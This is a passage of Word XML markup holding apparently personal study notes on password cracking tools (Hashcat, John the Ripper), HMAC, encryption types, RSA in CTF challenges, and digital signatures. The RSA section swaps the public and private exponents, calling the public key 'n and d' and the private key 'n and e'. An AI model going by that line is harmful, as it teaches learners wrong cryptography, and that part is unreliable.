    <w:p w14:paraId="6F13EF97" w14:textId="19B4B249" w:rsidR="00036B4F" w:rsidRPr="0084205E" w:rsidRDefault="00036B4F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> is best </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>run on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> host, as VM does not have direct access to GPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442868D2" w14:textId="155B8904" w:rsidR="00036B4F" w:rsidRPr="0084205E" w:rsidRDefault="00036B4F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Can run on CPU as of Kali 2020.2 but not as fast as host GPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283FBB52" w14:textId="32C6B778" w:rsidR="00036B4F" w:rsidRPr="0084205E" w:rsidRDefault="00036B4F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Never use - -force for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5242F6DA" w14:textId="7D254428" w:rsidR="00036B4F" w:rsidRPr="0084205E" w:rsidRDefault="00036B4F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>JohntheRipper uses CPU by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC7132D" w14:textId="312BB81C" w:rsidR="00036B4F" w:rsidRPr="0084205E" w:rsidRDefault="00722CC0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Integrity Checking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7542D120" w14:textId="1477D71E" w:rsidR="00722CC0" w:rsidRPr="0084205E" w:rsidRDefault="00FD65C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>HMACS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54845DC8" w14:textId="551CEC81" w:rsidR="00FD65C5" w:rsidRPr="0084205E" w:rsidRDefault="00FD65C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Using cryptographic hashing function to verify the authenticity and integrity of data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A9FD49" w14:textId="01BA8D79" w:rsidR="00FD65C5" w:rsidRPr="0084205E" w:rsidRDefault="00FD65C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>HMAC can be used to ensure that the person who created the HMAC is who they say they are without modification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD1FF4B" w14:textId="65F6BF77" w:rsidR="00FD65C5" w:rsidRPr="0084205E" w:rsidRDefault="00FD65C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use secret key and hashing algorithm to produce a hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461C257A" w14:textId="46F0F1E9" w:rsidR="00FD65C5" w:rsidRPr="0084205E" w:rsidRDefault="00FD65C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ENCRYPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247D644B" w14:textId="55E3E219" w:rsidR="00FD65C5" w:rsidRPr="0084205E" w:rsidRDefault="00FD65C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Critical for CIA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2265B5C5" w14:textId="0DC7256B" w:rsidR="00A74B02" w:rsidRPr="0084205E" w:rsidRDefault="00A74B02" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Essential for data at rest and in transit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF344A7" w14:textId="197B017A" w:rsidR="00A74B02" w:rsidRPr="0084205E" w:rsidRDefault="00A74B02" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>PCI-DSS, GDPR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF45E58" w14:textId="56A0E1CF" w:rsidR="00A74B02" w:rsidRPr="0084205E" w:rsidRDefault="00A74B02" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Modulo Operator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7503A0C1" w14:textId="1956CB5A" w:rsidR="00A74B02" w:rsidRPr="0084205E" w:rsidRDefault="00A74B02" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Remainder % of X/Y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C4099F" w14:textId="5C66D3B4" w:rsidR="00A74B02" w:rsidRPr="0084205E" w:rsidRDefault="00A74B02" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Not reversible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD48624" w14:textId="5C9FAE27" w:rsidR="00A74B02" w:rsidRPr="0084205E" w:rsidRDefault="00A74B02" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Two Types of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Encryption</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="74E8F9B0" w14:textId="340B4BD4" w:rsidR="00A74B02" w:rsidRPr="0084205E" w:rsidRDefault="00A74B02" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Symmetric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3068D8FC" w14:textId="565ED262" w:rsidR="00A74B02" w:rsidRPr="0084205E" w:rsidRDefault="00A74B02" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>DES (Broken) and AES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB9E5A7" w14:textId="38DE6F7F" w:rsidR="00A74B02" w:rsidRPr="0084205E" w:rsidRDefault="00A74B02" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Smaller keys (128/256 for AES, 56 for DES)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B4F486" w14:textId="48682CA9" w:rsidR="00A74B02" w:rsidRPr="0084205E" w:rsidRDefault="00A74B02" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Asymmetric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F861AD9" w14:textId="045195D7" w:rsidR="00A74B02" w:rsidRPr="0084205E" w:rsidRDefault="00A74B02" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>RSA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EE0384" w14:textId="124F790F" w:rsidR="00A74B02" w:rsidRPr="0084205E" w:rsidRDefault="00A74B02" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Elliptic Curve Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE3FA70" w14:textId="09982AAF" w:rsidR="00A74B02" w:rsidRPr="0084205E" w:rsidRDefault="00A74B02" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Larger keys (2048-4096 for RSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAA290F" w14:textId="6E76A1F8" w:rsidR="00A74B02" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>RSA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5830868D" w14:textId="4D5CA38E" w:rsidR="00206F11" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Based on large number factoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FB66A9" w14:textId="1E976287" w:rsidR="00206F11" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Comes up often in CTFs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AB9B7A" w14:textId="06A166F9" w:rsidR="00206F11" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Rely on the Wiki page for help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F8057E" w14:textId="7CEE38C1" w:rsidR="00206F11" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>RsaCtfTool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0598C4D4" w14:textId="7A71AC38" w:rsidR="00206F11" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rsatool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">” – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67EC4DCE" w14:textId="28DA1AFE" w:rsidR="00206F11" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Essential variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524A3825" w14:textId="655842BF" w:rsidR="00206F11" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“p, q, m, n, e, d, c”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06058656" w14:textId="18AEDEDF" w:rsidR="00206F11" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Primes – p and q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A8C025" w14:textId="4C65EA7C" w:rsidR="00206F11" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Public key – n and d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE169FD" w14:textId="7BCB1BC7" w:rsidR="00206F11" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Private key is n and e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F59B0D" w14:textId="0AFC18E0" w:rsidR="00206F11" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Plaintext – m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612638AE" w14:textId="6F66B9F9" w:rsidR="00206F11" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ciphertext – c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5E1C88" w14:textId="10374976" w:rsidR="00206F11" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>RSA CTFs are often sets of values and breaking the encryption to decrypt and retrieve a flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3409ED6A" w14:textId="46ABBADE" w:rsidR="00206F11" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Establishing Keys Using Asymmetric Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452CC34B" w14:textId="54A322BF" w:rsidR="00206F11" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exchanging keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1178D088" w14:textId="2948C1B6" w:rsidR="00206F11" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use asymmetry to transport symmetry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673C2667" w14:textId="27A3A25F" w:rsidR="00206F11" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>PK crypto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B98D800" w14:textId="535D3C8B" w:rsidR="00206F11" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Digital Signatures and Certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE871CB" w14:textId="2017434C" w:rsidR="00206F11" w:rsidRPr="0084205E" w:rsidRDefault="00206F11" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>DS proves authenticity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377D7474" w14:textId="3DDD2274" w:rsidR="00E540BC" w:rsidRPr="0084205E" w:rsidRDefault="00E540BC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Produced via asymmetry with private key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677F90A8" w14:textId="5FA55AC0" w:rsidR="00E540BC" w:rsidRPr="0084205E" w:rsidRDefault="00E540BC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Verified with public key</w:t>
      </w:r>
    </w:p>
